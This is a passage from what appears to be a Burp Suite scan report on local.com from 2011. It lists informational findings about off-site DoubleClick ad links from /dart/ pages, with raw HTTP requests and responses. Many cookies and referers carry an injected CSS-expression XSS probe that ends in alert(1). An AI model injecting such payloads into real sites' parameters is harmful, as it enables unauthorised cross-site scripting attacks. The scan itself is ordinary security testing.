Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.2.10.1296748820; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:27 GMT
Connection: close
Content-Length: 834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=170x150;ord=1296748848750?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=170x150;ord=1296748848750?" border="0" alt="" /></a>
...[SNIP]...

8.47. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.sp&pos=3&t=3&sz=160x600&ord=1296748830841&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=3;tile=3;cat=financial_services;city=dallas_tx;sz=160x600;ord=1296748830841?
http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=3;tile=3;cat=financial_services;city=dallas_tx;sz=160x600;ord=1296748830841?

Request

GET /dart/?ag=True&p=locm.sp&pos=3&t=3&sz=160x600&ord=1296748830841&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f%22style%3d%22x%3aexpression(alert(1))%22fccc9411126
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.1.10.1296748820; __qca=P0-30084348-1296748820628; ASP.NET_SessionId=en03gt2mbtrg5hymvlucfg2l; localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=41e9b545-7b15-424c-972c-65baecb81534&expdate=634349085968705455&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_jsa134f%22style%253d%22x%253aexpression(alert(1))%22fccc9411126&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506&exp=634323183968705455

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:09 GMT
Connection: close
Content-Length: 975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=3;tile=3;cat=financial_services;city=dallas_tx;sz=160x600;ord=1296748830841?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=3;tile=3;cat=financial_services;city=dallas_tx;sz=160x600;ord=1296748830841?" border="0" alt="" /></a>
...[SNIP]...

8.48. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&pos=8&t=8&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748882748?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748882748?

Request

GET /dart/?ag=True&p=locm.pp&pos=8&t=8&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 840
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:03 GMT
Connection: close
Content-Length: 840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748882748?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748882748?" border="0" alt="" /></a>
...[SNIP]...

8.49. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748882748?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748882748?

Request

GET /dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 840
Date: Thu, 03 Feb 2011 16:01:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748882748?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748882748?" border="0" alt="" /></a>
...[SNIP]...

8.50. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748870273&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748870273?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748870273?

Request

GET /dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748870273&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/equity-bank-63975058/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 840
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Content-Length: 840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748870273?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748870273?" border="0" alt="" /></a>
...[SNIP]...

8.51. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748884962&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748884962?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748884962?

Request

GET /dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748884962&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 840
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Content-Length: 840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748884962?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748884962?" border="0" alt="" /></a>
...[SNIP]...

8.52. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&sz=491x223&ord=1296748883062&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748883062?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748883062?

Request

GET /dart/?ag=True&p=locm.pp&sz=491x223&ord=1296748883062&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748883062?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748883062?" border="0" alt="" /></a>
...[SNIP]...

8.53. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.sp&sz=170x150&ord=1296748830841&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=170x150;ord=1296748830841?
http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=170x150;ord=1296748830841?

Request

GET /dart/?ag=True&p=locm.sp&sz=170x150&ord=1296748830841&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f%22style%3d%22x%3aexpression(alert(1))%22fccc9411126
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.1.10.1296748820; __qca=P0-30084348-1296748820628; ASP.NET_SessionId=en03gt2mbtrg5hymvlucfg2l; localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=41e9b545-7b15-424c-972c-65baecb81534&expdate=634349085968705455&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_jsa134f%22style%253d%22x%253aexpression(alert(1))%22fccc9411126&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506&exp=634323183968705455

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:09 GMT
Connection: close
Content-Length: 834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=170x150;ord=1296748830841?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=170x150;ord=1296748830841?" border="0" alt="" /></a>
...[SNIP]...

8.54. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&css=banner&p=locm.pp&pos=1&t=1&sz=728x90&ord=1296748870273&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748870273?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748870273?

Request

GET /dart/?ag=True&css=banner&p=locm.pp&pos=1&t=1&sz=728x90&ord=1296748870273&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/equity-bank-63975058/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; 